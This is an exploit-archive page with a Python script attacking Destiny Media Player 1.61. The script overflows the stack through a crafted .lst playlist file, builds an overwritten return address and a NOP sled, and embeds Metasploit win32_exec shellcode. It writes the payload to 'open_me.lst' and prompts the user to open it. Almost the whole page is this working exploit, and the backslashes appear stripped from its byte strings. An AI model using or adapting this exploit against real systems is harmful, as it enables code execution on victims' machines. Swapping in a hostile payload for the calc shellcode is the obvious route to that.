[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #5
# Published : 2009-01-04
# Author : suN8Hclf
# Previous Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #4
# Next Title : Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit
print "====================================================================="
print " Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploitn"
print " Discovered by : Encrypt3d.M!nd"
print " exploit code by : suN8Hclf"
print " Tested on : Windows 2000 SP4 Polish"
print " Greetings to : 0in, Gynvael Coldwind, doctor, Katharsis, SkD"
print "====================================================================="
buffer = "x41" * 2052
NEW_EIP = "x33x08x3ax77" #call ESP from atl.dll
nops = "x90" * 10
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9"
"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05"
"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09"
"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d"
"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26"
"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64"
"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb"
"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28"
"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44"
"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38"
"xacx2cxc9x40"
)
exploit = buffer + NEW_EIP + nops + shellcode
try:
out_file = open("open_me.lst",'w')
out_file.write(exploit)
out_file.close()
raw_input("nNow open open_me.lst file to exploit bug!n")
except:
print "WTF?"
# www.Syue.com [2009-01-04]